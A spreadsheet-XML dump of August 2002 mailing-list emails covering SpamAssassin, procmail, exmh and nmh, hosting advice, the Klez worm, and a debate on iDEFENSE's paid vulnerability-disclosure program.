    <t>At 3:59 PM +0100 8/22/02, Justin Mason wrote:\n&gt;Justin Shore said:\n&gt;\n&gt;&gt;  I just ran across a false positive that scored 8.6.  The message was\n&gt;&gt;  a solicited ad from Apple.com on educator deals.  I can send a copy\n&gt;&gt;  if anyone wants it.\n&gt;\n&gt;Yes, please do send it on, and I'll add it to the non-spam corpus.\n\nTo any particular address?  I checked the lists page but didn't see \nan address to see a FP to.\n\n&gt;To date, the scores evolved by SpamAssassin are very biased towards\n&gt;non-HTML, non-newsletter-ish mail.  This release should be different, as\n&gt;I've been spending the last month signing up a "nonspamtrap" to every\n&gt;legit newsletter I can find ;)\n\nThat's understandable.  HTML mail is the worst thing since female \nshoe sales at the mall. ;-)  Signup for the cruisercustomizing.com \nnewsletter.  Great place to find and review motorcycle parts. :)\n\n&gt;This should mean that tests which match common-enough newsletter practices\n&gt;will no longer get such high scores once we re-run the GA.\n\nSound pretty slick.  If I come across any more legit newsletters, \nI'll send them your way.\n\nThanks for the info\n  Justin\n-- \n\n--\nJustin Shore, ES-SS ES-SSR                Pittsburg State University\nNetwork &amp; Systems Manager                 [URL]http://www.pittstate.edu[/URL]\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lt;zzzzteana@yahoogroups.com&gt;\nFrom: "leslie ellen jones" &lt;lejones@ucla.edu&gt;\nDate: Thu, 22 Aug 2002 10:19:48 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:19:48 -0700</t>
  </si>
  <si>
    <t>"leslie ellen jones" &lt;lejones@ucla.edu&gt;</t>
  </si>
  <si>
    <t>Hey, it's not easy being green.\n\nleslie\n\nLeslie Ellen Jones, Ph.D.\nJack of All Trades and Doctor of Folklore\nlejones@ucla.edu\n\n"Truth is an odd number" -- Flann O'Brien\n  ----- Original Message ----- \n  From: Dino \n  To: zzzzteana@yahoogroups.com \n  Sent: Thursday, August 22, 2002 10:13 AM\n  Subject: RE: [zzzzteana] Which Muppet Are You?\n\n\n  Damn kermit...boring...\n  Wanna be rizzo he's the coolest\n  Dino\n\n\n        Yahoo! Groups Sponsor \n              ADVERTISEMENT\n             \n       \n\n  To unsubscribe from this group, send an email to:\n  forteana-unsubscribe@egroups.com\n\n\n\n  Your use of Yahoo! Groups is subject to the Yahoo! Terms of Service. \n\n\n\n[Non-text portions of this message have been removed]\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: "NOI Administrator" &lt;admin@networksonline.com&gt;\nDate: Thu, 22 Aug 2002 10:16:36 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:16:36 -0400</t>
  </si>
  <si>
    <t>"NOI Administrator" &lt;admin@networksonline.com&gt;</t>
  </si>
  <si>
    <t>[SAtalk] SA CGI Configurator Scripts</t>
  </si>
  <si>
    <t>I have been trying to research via SA mirrors and search engines if a canned\nscript exists giving clients access to their user_prefs options via a\nweb-based CGI interface. Numerous ISPs provide this feature to clients, but\nso far I can find nothing. Our configuration uses Amavis-Postfix and ClamAV\nfor virus filtering and Procmail with SpamAssassin for spam filtering. I\nwould prefer not to have to write a script myself, but will appreciate any\nsuggestions.\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Kragen Sitaker &lt;kragen@pobox.com&gt;\nFrom: Adam Shostack &lt;adam@homeport.org&gt;\nDate: Thu, 22 Aug 2002 10:08:09 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:08:09 -0400</t>
  </si>
  <si>
    <t>Adam Shostack &lt;adam@homeport.org&gt;</t>
  </si>
  <si>
    <t>Re: the underground software vulnerability marketplace and its</t>
  </si>
  <si>
    <t>Hi Kragen,    This is an interesting analysis.  I think that there are a couple of nits I might pick (for example, I don't expect that the market will be well developed with highest bidders for while), I think that the most important issue, which is that end users won't be able to fix their systems, is almost passed over.  I know that you know this, and you allude to it, but your essay is getting passed around, so you might want to add to it bits about the sysadmin and others.    There's one other point which you don't make, which I think is very important, which is that research into defining and addressing classes of vulnerabilities can't happen without libraries of available vulnerability code.  I can think of three researchers into automated methods for addressing vulnerabilities who griped, uninvited, about the quality of the existing vulnerability sites.  Doing research into a set requires that you have enough examples, in the open, that you can define a set, and that the set is added to from time to time so you can make and test predictions.    I feel fairly confident in saying that without full disclosure, we wouldn't have Stackguard, ITS4, Nissus, or snort.  And the security admin's job would be a lot harder. Adam On Thu, Aug 22, 2002 at 08:42:12AM +0200, Eugen Leitl wrote: | --  | -- Eugen* Leitl leitl | ______________________________________________________________ | ICBMTO: N48 04'14.8'' E11 36'41.2'' [URL]http://eugen.leitl.org[/URL] | 83E5CA02: EDE4 7193 0833 A96B 07A7  1A88 AA58 0E89 83E5 CA02 |  |  | ---------- Forwarded message ---------- | Date: Thu, 22 Aug 2002 00:24:54 -0400 (EDT) | From: Kragen Sitaker  | To: fork@spamassassin.taint.org | Subject: the underground software vulnerability marketplace and its hazards |  | On August 7th, an entity known as "iDEFENSE" sent out an announcement, | which is appended to this email.  Briefly, "iDEFENSE", which bills | itself as "a global security intelligence company", is offering cash | for information about security vulnerabilities in computer software | that are not publicly known, especially if you promise not to tell | anyone else. |  | If this kind of secret traffic is allowed to continue, it will pose a | very serious threat to our computer communications infrastructure. |  | At the moment, the dominant paradigm for computer security research | known as "full disclosure"; people who discover security | vulnerabilities in software tell the vendor about them, and a short | while later --- after the vendor has had a chance to fix the problem | --- they publish the information, including code to exploit the | vulnerability, if possible.   |  | This method has proven far superior to the old paradigm established by | CERT in the late 1980s, which its proponents might call "responsible | disclosure" --- never release working exploit code, and never release | any information on the vulnerability before all vendors have released | a patch.  This procedure often left hundreds of thousands of computers | vulnerable to known bugs for months or years while the vendors worked | on features, and often, even after the patches were released, people | wouldn't apply them because they didn't know how serious the problem | was. |  | The underground computer criminal community would often discover and | exploit these same holes for months or years while the "responsible | disclosure" process kept their victims, who had no connections in the | underground, vulnerable. |  | The problem with this is that vulnerabilities that are widely known | are much less dangerous, because their victims can take steps to | reduce their potential impact --- including disabling software, | turning off vulnerable features, filtering traffic in transit, and | detecting and responding to intrusions.  They are therefore much less | useful to would-be intruders.  Also, software companies usually see | security vulnerabilities in their software as PR problems, and so | prefer to delay publication (and the expense of fixing the bugs) as | long as possible. |  | iDEFENSE is offering a new alternative that appears far more dangerous | than either of the two previous paradigms.  They want to be a buyer in | a marketplace for secret software vulnerability information, rewarding | discoverers of vulnerabilities with cash.   |  | Not long before, Snosoft, a group of security researchers evidently | including some criminal elements, apparently made an offer to sell the | secrecy of some software vulnerability information to the software | vendor; specifically, they apparently made a private offer to | Hewlett-Packard to keep a vulnerability in HP's Tru64 Unix secret if | HP retained Snosoft's "consulting services".  HP considered this | extortion and responded with legal threats, and Snosoft published the | information. |  | If this is allowed to happen, it will cause two problems which, | together, add up to a catastrophe. |  | First, secret software vulnerability information will be available to | the highest bidder, and to nobody else.  For reasons explained later, | I think the highest bidders will generally be organized crime | syndicates, although that will not be obvious to the sellers. |  | Second, finding software vulnerabilities and keeping them secret will | become lucrative for many more talented people.  The result will be | --- just as in the "responsible disclosure" days --- that the good | guys will remain vulnerable for months and years, while the majority | of current vulnerabilities are kept secret. |  | I've heard it argued that the highest bidders will generally be the | vendors of the vulnerable software, but I don't think that's | plausible.  If someone can steal $20 000 because a software bug lets | them, the software vendor is never held liable; often, in fact, the | people who administer the software aren't liable, either --- when | credit card data are stolen from an e-commerce site, for example. | Knowing about a vulnerability before anyone else might save a web-site | administrator some time, and it might save the software vendor some | negative PR, but it can net the thief thousands of dollars. |  | I think the highest bidders will be those for whom early vulnerability | information is most lucrative --- the thieves who can use it to | execute the largest heists without getting caught.  Inevitably, that | means organized crime syndicates, although the particular gangs who | are good at networked theft may not yet exist. |  | There might be the occasional case where a market leader, such as | Microsoft, could make more money by giving their competitors bad PR | than a gang could make by theft.  Think of a remote-root hole in | Samba, for example. |  | Right now, people who know how to find security exploits are either | motivated by personal interest in the subject, motivated by the public | interest, motivated by a desire for individual recognition, or | personally know criminals that benefit from their exploits.  Creating | a marketplace in secret vulnerability information would vastly | increase the availability of that information to the people who can | afford to pay the most for it: spies, terrorists, and organized crime. |  | Let's not let that happen. |  |  |  |  | This is the original iDEFENSE announcement: |  | From: Sunil James [mailto:SJames@iDefense.com] | Sent: Wednesday, August 07, 2002 12:32 PM | Subject: Introducing iDEFENSE's Vulnerability Contributor Program |  |  | Greetings, |  | iDEFENSE is pleased to announce the official launch of its Vulnerability | Contributor Program (VCP). The VCP pays contributors for the advance | notification of vulnerabilities, exploit code and malicious code. |  | iDEFENSE hopes you might consider contributing to the VCP. The following | provides answers to some basic questions about the program: |  | Q. How will it work? | A. iDEFENSE understands the majority of security researchers do not publish | security research for compensation; rather, it could be for any of a number | of motivations, including the following: |  |          * Pure love of security research |          * The desire to protect against harm to targeted networks |          * The desire to urge vendors to fix their products |          * The publicity that often accompanies disclosure |  | The VCP is for those who want to have their research made public to the | Internet community, but who would also like to be paid for doing the | work.The compensation will depend, among other things, on the following | items: |  |          * The kind of information being shared (i.e. vulnerability or exploit) |          * The amount of detail and analysis provided |          * The potential severity level for the information shared |          * The types of applications, operating systems, and other |            software and hardware potentially affected |          * Verification by iDEFENSE Labs |          * The level of exclusivity, if any, for data granted to iDEFENSE |  | Q. Who should contribute to the VCP? | A. The VCP is open to any individual, security research group or other | entity. |  | Q. Why are you launching this program? | A. Timeliness remains a key aspect in security intelligence. Contributions | to some lists take time before publication to the public at large. More | often, many of these services charge clients for access without paying the | original contributor. Under the iDEFENSE program, the contributor is | compensated, iDEFENSE Labs verifies the issue, and iDEFENSE clients and the | public at large are warned in a timely manner. |  | Q. Who gets the credit? | A. The contributor is always credited for discovering the vulnerability or | exploit information. |  | Q. When can I contribute? | The VCP is active. You are welcome to begin contributing today. |  | To learn more, go to [URL]http://www.idefense.com[/URL] If you have | questions or would like to sign up as a contributor to the VCP, please | contact us at contributor@idefense.com. |  | Regards, |  | Sunil James | Technical Analyst | iDEFENSE |  | "iDEFENSE is a global security intelligence company that proactively | monitors sources throughout the world -- from technical vulnerabilities and | hacker profiling to the global spread of viruses and other malicious code. | The iALERT security intelligence service provides decision-makers, frontline | security professionals and network administrators with timely access to | actionable intelligence and decision support on cyber-related threats. | iDEFENSE Labs is the research wing that verifies vulnerabilities, examines | the behavior of exploits and other malicious code and discovers new | software/hardware weaknesses in a controlled lab environment." |  | [URL]http://xent.com[/URL] |  --  "It is seldom that liberty of any kind is lost all at once." 					               -Hume [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://eugen.leitl.org http://www.idefense.com http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 22 Aug 2002 10:04:06 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:04:06 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-398538836P Content-Type: text/plain; charset=us-ascii &gt; From:  Robert Elz  &gt; Date:  Thu, 22 Aug 2002 18:32:00 +0700 &gt; &gt;     Date:        Wed, 21 Aug 2002 10:54:46 -0500 &gt;     From:        Chris Garrigues  &gt;     Message-ID:  &lt;1029945287.4797.TMDA@deepeddy.vircio.com&gt; &gt;  &gt;   | I can't reproduce this error. &gt;  &gt; Ah, I think I just found the cause, nmh is broken (which is probably &gt; obvious from my previous mail). &gt;  &gt; The man page for pick (and how it always used to work) was that -list &gt; would list messages matched.  -nolist would supress that.   If -sequence &gt; is given the default is -nolist, without -sequence the default is -list. &gt;  &gt; That's all fine - but it appears now (which probably means I had never &gt; used pick since I upgraded nmh last) that what counts is the order of &gt; -list and -sequence - that is, if -sequence comes after -list, the -list &gt; gets turned off (-sequence implies -nolist instead of just making -nolist &gt; the default). &gt;  &gt; An easy workaround for this is to make sure that -list is the last arg &gt; given to pick, so if I run ... &gt;  &gt; delta$ pick +inbox -lbrace -lbrace -subject ftp -rbrace -rbrace  4852-4852  &gt; -sequence mercury -list &gt; 4852 &gt;  &gt; which is just as it should be. hmmm, I assume you're going to report this to the nmh folks? Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-398538836P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZP1lK9b4h5R0IUIRAhSFAJ0dWespJZxDa1q6t1yyulLXBp1ryACfUF+D ltpgX3KXYwpbhGV2bUHY6gY= =H9ck -----END PGP SIGNATURE----- --==_Exmh_-398538836P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: webdev@linux.ie\nFrom: Lee Hosty &lt;hostyle@csn.ul.ie&gt;\nDate: Thu, 22 Aug 2002 10:01:12 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 10:01:12 +0100</t>
  </si>
  <si>
    <t>Lee Hosty &lt;hostyle@csn.ul.ie&gt;</t>
  </si>
  <si>
    <t>Re: [Webdev] PHP/MySQL Virtual Hosting Recommendations?</t>
  </si>
  <si>
    <t>At 07:44 PM 21/08/2002 +0100, elvin@eircom.net wrote:\n\n&gt;Circa 50MB-100MB web space for now\n&gt;POP email accounts\n&gt;Account Control Panel\n&gt;Perl\n&gt;PHP\n&gt;MySQL\n&gt;FTP and Telnet Access 24/7\n\nYou'll be lucky to get telnet anywhere, SSH should do though.\n\n&gt;Own CGI-BIN\n&gt;Webalizer Graphical Stats\n&gt;Server Side Includes\n&gt;Good Reachable Technical Support\n&gt;\n&gt;I have seen a great looking 300MB solution in the region of 600Euro p.a. \n&gt;which at the moment is a bit over my financial head in one payment - I \n&gt;haven't completed any sites yet, but have a few potential jobs coming up.\n&gt;\n&gt;Any tips/pointers much appreciated!\n\nTry [URL]www.hosting365.ie[/URL] - they haven't let me down yet.\n\nYou could try iewebs.com aswell, though I don't know if they do "just hosting".\n\n\nLee Hosty -x- hostyle AT csn.ul.ie -x- +353 (0)86 8768780\n--\nPLEELEY (adj.)\nDescriptive of a drunk person's attempt to be endearing.\n\n\n\n\n_______________________________________________\nWebdev mailing list\nWebdev@linux.ie\n[URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>www.hosting365.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 22 Aug 2002 09:59:35 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 09:59:35 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_-403670396P Content-Type: text/plain; charset=us-ascii &gt; From:  Anders Eriksson  &gt; Date:  Mon, 19 Aug 2002 23:05:30 +0200 &gt; &gt;  &gt; &gt; &gt; Just cvs up'ed and nowadays Catch-up Unseen is __extremely__ slow on  &gt; &gt; &gt; large (&gt;100 msgs) unseen sequences. Anybody else having this problem? &gt; &gt;  &gt; &gt; I'll take the blame. &gt; &gt;  &gt; &gt; The reason, I suspect, is that we're needlessly reading the .sequences file  &gt; &gt; multiple times because of other sequences.  I need to make the code much  &gt; &gt; smarter about handling that file, but first I have a few other fish to fry in  &gt; &gt; my rather large patch that's on it's way. &gt; &gt;  &gt;  &gt; No panic, &gt;  &gt; I'm all for cleaning things up before getting it optimized. Okay, this fix is now checked in. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-403670396P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZPxXK9b4h5R0IUIRAvrpAJ47Bzr8fOBqRvDy70Zo+q/dBaDv+wCdGlkP 35PlaPfCqzM6h0Y9RwT/JmQ= =7ghD -----END PGP SIGNATURE----- --==_Exmh_-403670396P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Ed Greenberg &lt;edg@greenberg.org&gt;,\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Thu, 22 Aug 2002 09:45:16 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 09:45:16 -0500</t>
  </si>
  <si>
    <t>Ed Greenberg &lt;edg@greenberg.org&gt;,</t>
  </si>
  <si>
    <t>Re: [SAtalk] SA and Patented Ideas (was: SA In The News)</t>
  </si>
  <si>
    <t>At 8:43 PM -0700 8/21/02, Ed Greenberg wrote:\n&gt;At 11:19 PM 8/20/2002 -0700, dan@dankohn.com wrote:\n&gt;\n&gt;&gt;The nature of our patent is about putting a warrant mark in RFC 2822\n&gt;&gt;X-headers (or in the body) to allow senders to warrant their mail as\n&gt;&gt;*not-spam*, and then to use copyright and trademark infringement to\n&gt;&gt;enable Habeas to enforce that warranty.\n\nWhy is it that I envision Verisign doing something like this.  Yeah, \nlike I want Verisign to sign all my spam, er, mail for me.  Pay them \nenough and they'd probably sign spam too. ;)\n\nJ\n-- \n\n--\nJustin Shore, ES-SS ES-SSR                Pittsburg State University\nNetwork &amp; Systems Manager                 [URL]http://www.pittstate.edu[/URL]\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undisclosed-recipient: ;\nFrom: Monty Solomon &lt;monty@roscom.com&gt;\nDate: Thu, 22 Aug 2002 09:15:25 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 09:15:25 -0400</t>
  </si>
  <si>
    <t>Monty Solomon &lt;monty@roscom.com&gt;</t>
  </si>
  <si>
    <t>undisclosed-recipient: ;</t>
  </si>
  <si>
    <t>[IRR] Klez: The Virus That  Won't Die</t>
  </si>
  <si>
    <t>Klez: The Virus That Won't Die\n \nAlready the most prolific virus ever, Klez continues to wreak havoc.\n\nAndrew Brandt\n&gt;&gt;From the September 2002 issue of PC World magazine\nPosted Thursday, August 01, 2002\n\n\nThe Klez worm is approaching its seventh month of wriggling across \nthe Web, making it one of the most persistent viruses ever. And \nexperts warn that it may be a harbinger of new viruses that use a \ncombination of pernicious approaches to go from PC to PC.\n\nAntivirus software makers Symantec and McAfee both report more than \n2000 new infections daily, with no sign of letup at press time. The \nBritish security firm MessageLabs estimates that 1 in every 300 \ne-mail messages holds a variation of the Klez virus, and says that \nKlez has already surpassed last summer's SirCam as the most prolific \nvirus ever.\n\nAnd some newer Klez variants aren't merely nuisances--they can carry \nother viruses in them that corrupt your data.\n\n...\n\n[URL]http://www.pcworld.com[/URL],aid,103259,00.asp\n_______________________________________________\nIrregulars mailing list\nIrregulars@tb.tf\n[URL]http://tb.tf[/URL]</t>
  </si>
  <si>
    <t>http://www.pcworld.com http://tb.tf</t>
  </si>
  <si>
    <t>To: "J. W. Ballantine" &lt;jwb@homer.att.com&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 22 Aug 2002 09:12:16 -0500</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 09:12:16 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_1547759024P Content-Type: text/plain; charset=us-ascii &gt; From:  "J. W. Ballantine"  &gt; Date:  Wed, 21 Aug 2002 09:51:31 -0400 &gt; &gt; I CVS'ed the unseen/Sequences changes and installed them, and have only one  &gt; real issue. &gt;  &gt; I use the unseen window rather than the exmh icon, and with the new code &gt; I can't seem to be able to.  How many unseen when when I have the main window open &gt; is not really necessary. hmmm, I stole the code from unseenwin, but I never tested it since I don't use  that functionality.  Consider it on my list of things to check. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_1547759024P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZPFAK9b4h5R0IUIRAkjyAJ4jjjhAVRx5FiwuCMa+QBWsbbE2jQCaAj4x NhIgYqnx9/1wvdSgesQhMIU= =vA3k -----END PGP SIGNATURE----- --==_Exmh_1547759024P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: SpamAssassin List &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: Russ Gilman-Hunt &lt;rgilmanhunt@hotp.com&gt;\nDate: Thu, 22 Aug 2002 09:09:12 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 09:09:12 -0700</t>
  </si>
  <si>
    <t>Russ Gilman-Hunt &lt;rgilmanhunt@hotp.com&gt;</t>
  </si>
  <si>
    <t>[SAtalk] procmail help</t>
  </si>
  <si>
    <t>I'm fairly confused here, with Procmail. \nI know this isn't a procmail list per-se; feel free to answer my questions in \nprivate email to r_gilmanhunt@hotp.com.  \n\nI've looked for web-stuff to answer this question but I can't find anything \nspecific on this scenario.\n\nHere's the situation. \nI have a global /etc/procmailrc file. It works, and when I insert stuff into \nit for logging (LOGFILE=/root/procmail.log, VERBOSE=yeah. LOGABSTRACT=all) it \nshows up where I expect it to (the log in /root/procmail.log)  At the end of \nthis file, I use \n :0fw\n | spamc\nto call spamassassin.\n\nAlso in it is a carboncopy recipe (yes, I know, it's one of the evils we do \nfor our corporate masters)  (at the top) (to their credit, I am instructed \nthat they are not interested in the actual contents, but are concerned about \nfuture lawsuits and their culpability, so they want a record made. Discussion \non this point is immaterial)\n:0\n  * ? test -d $ARCHIVEDIR/$DATEDIR || mkdir -p --mode=750 $ARCHIVEDIR/$DATEDIR\n  { }\n:0 c\n $SAVEAT\n\nI have several users where I forward certain spams to /dev/null  . . .their \nprocmailrc file (/home/$user/.procmailrc) looks like this:\n:0\n  * ^From: .*spermfun.com\n  /dev/null\n\nNow I've got a person who needs a copy of her inbound emails sent to another \nemail address (outside the company), so I've got this recipe in her \n/home/$user/.procmailrc file:\n:0 c\n  !user@domain.tld\n\nIt almost looks like procmail's not running a user's copy recipe after a \nglobal copy recipe, except that I can replace that user's one with \n:0 \n * ^Subject: .*test\n  procmail.holder\nand get the same result.\n\nThe result, to put it succinctly, is "nothing". No forwards go out, no files \nare made, if I try to log information, no logs are set up. I've modified the \nuser/group and permissions to match known-working recipes (the spermfun \nexample above) and still nothing.  However, I can redirect those other \nmessages.  In other words- just this user's procmailrc file is not working- \nother users have no problems.\n\nAny suggestions would be helpful :) \n\n-Russ\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deccy@csn.ul.ie'" &lt;deccy@csn.ul.ie&gt;, ilug@linux.ie\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Thu, 22 Aug 2002 09:02:34 +0100</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 09:02:34 +0100</t>
  </si>
  <si>
    <t>"'deccy@csn.ul.ie'" &lt;deccy@csn.ul.ie&gt;, ilug@linux.ie</t>
  </si>
  <si>
    <t>RE: [ILUG] redhat kickstart</t>
  </si>
  <si>
    <t>Check out this. Its for compaq kit, but a pc's a pc ;--)\n\n[URL]http://www.geocities.com[/URL]\n\nThere are other articles too.\n\nHope that helps,\n\nCW\n----------------\nHow many Redhat admins out there use the redhat kickstart?\nIf you don't use it, how do you install redhat on all your \nworkstations, do you do it by hand, with the cds?\n\nAs we are looking at using Linux at work, I'm looking\ninto setting up the kickstart. There doesn't seem to\nbe a lot of documentation around about it.\n\nDoes anybody know if it would be possible to do the following:\nGet the machine to boot using DHCP and read it's kickstart\nconfig file from teh DHCP server and in this config file\nhave the machine configured to use a static IP, so that when\nthe machine is rebooted it will come up with it's new IP.\n\nAlso, There was no driver on the redhat network install flopopy\nfor the network card in the machine I'm installing. This required\nme to uncompress the floppy image, loop mount it, add in the module\nfor the network card and compress it all up again. I'm not going\nto be able to do this every time we get a new machine, I was\nwondering if instead of having a boot floppy, you could use a boot\ncdrom, but just for the purpose of having all the network card\nmodules on the cdrom. I'd still want it to get the packages from\nan NFS server on the network.\n\nAny help with this would be greatly appreciated,\ncheers,\ndeccy.\n\n-- \n---------------------------------------\nDeclan Houlihan\ndeccy@csn.ul.ie\n[URL]http://deccy.csn.ul.ie[/URL]\n---------------------------------------\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.geocities.com http://deccy.csn.ul.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: Marc Perkel &lt;marc@perkel.com&gt;\nDate: Thu, 22 Aug 2002 08:17:47 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 08:17:47 -0700</t>
  </si>
  <si>
    <t>[SAdev] Body Test Question /d ?</t>
  </si>
  <si>
    <t>Suppose I created a rule that was in this form:\n\nbody RULE_NAME /text to delete/d\n\nWould the "/d" delete this text from the body and mask it from the rest of the \nrules? If so - I'm thinking about applying it to Yahoo and SN and Juno ads so \nthat FPs are reduced.\n\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To: Theo Van Dinter &lt;felicity@kluge.net&gt;\nFrom: Marc Perkel &lt;marc@perkel.com&gt;\nDate: Thu, 22 Aug 2002 08:14:12 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 08:14:12 -0700</t>
  </si>
  <si>
    <t>Re: [SAdev] Live Rule Updates after Release ???</t>
  </si>
  <si>
    <t>Yes - great minds think alike. But even withput eval rules it would be very \nuseful. It would allow us to respond quickly to spammer's tricks.\n\nTheo Van Dinter wrote:\n&gt; On Thu, Aug 22, 2002 at 07:27:52AM -0700, Marc Perkel wrote:\n&gt; \n&gt;&gt;Has anyone though of the idea of live updates of rules after release? The \n&gt;&gt;idea being that the user can run a cron job once a week or so and get the \n&gt;&gt;new default rule set. This would allow us to react faster to:\n&gt; \n&gt; \n&gt; I suggested this a few months ago.  I don't remember the details of what\n&gt; came out of it except that it would only be useful for non-eval rules\n&gt; since those require code changes.\n&gt; \n\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To: SpamAssassin Talk ML &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: Bart Schaefer &lt;schaefer@zanshin.com&gt;\nDate: Thu, 22 Aug 2002 08:12:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 08:12:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: [SAtalk] SA In The News</t>
  </si>
  <si>
    <t>On Tue, 20 Aug 2002, Matthew Cline wrote:\n\n&gt; On Tuesday 20 August 2002 07:57 pm, Harold Hallikainen wrote:\n&gt; &gt; [URL]http://www.wired.com[/URL],1282,54645,00.html\n&gt; \n&gt; Summary: a company will offer short snippets of original, copyrighted\n&gt; and trademarked text that can be inserted into email message headers,\n&gt; and email filters can recognize this as a "not-spam" indicator.  Any\n&gt; spammers who use the text will be sued for copyright and trademark\n&gt; infringement.\n\nThey may be in for a patent fight before any of this goes forward:\n\n[URL]http://www.eweek.com[/URL],3959,476558,00.asp\n\n"Banking on the fact that few enterprises sending commercial mail want to \nbe associated with spam, IronPort Systems Inc., in San Bruno, Calif., has \ndeveloped the Bonded Sender program in an effort to give legitimate bulk \ne-mailers some credibility."\n\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http://www.wired.com http://www.eweek.com https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: Marc Perkel &lt;marc@perkel.com&gt;\nDate: Thu, 22 Aug 2002 07:58:42 -0700</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 07:58:42 -0700</t>
  </si>
  <si>
    <t>[SAdev] Party in San Francisco tonight</t>
  </si>
  <si>
    <t>I don't know how make of you are in the Bay Area but EFF is having a benifit \nparty ast the DNA Lounge in San Francisco tonight. Wil Weaton (Wesley Crussher \nfrom star Trek TNG) will fight Barney the Dinasour.\n\nCome on by if you're not doing anything.\n\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To: spamassassin.taint.org &lt;yyyy-redhat@spamassassin.taint.org&gt;\nFrom: Red Hat Network Alert &lt;rhn-admin@rhn.spamassassin.taint.org&gt;\nDate: Thu, 22 Aug 2002 04:08:37 -0400</t>
  </si>
  <si>
    <t>Thu, 22 Aug 2002 04:08:37 -0400</t>
  </si>
  <si>
    <t>Red Hat Network Alert &lt;rhn-admin@rhn.spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>spamassassin.taint.org &lt;yyyy-redhat@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RHN Errata Alert: New kernel update available, fixes i810 video oops, several security issues</t>
  </si>
  <si>
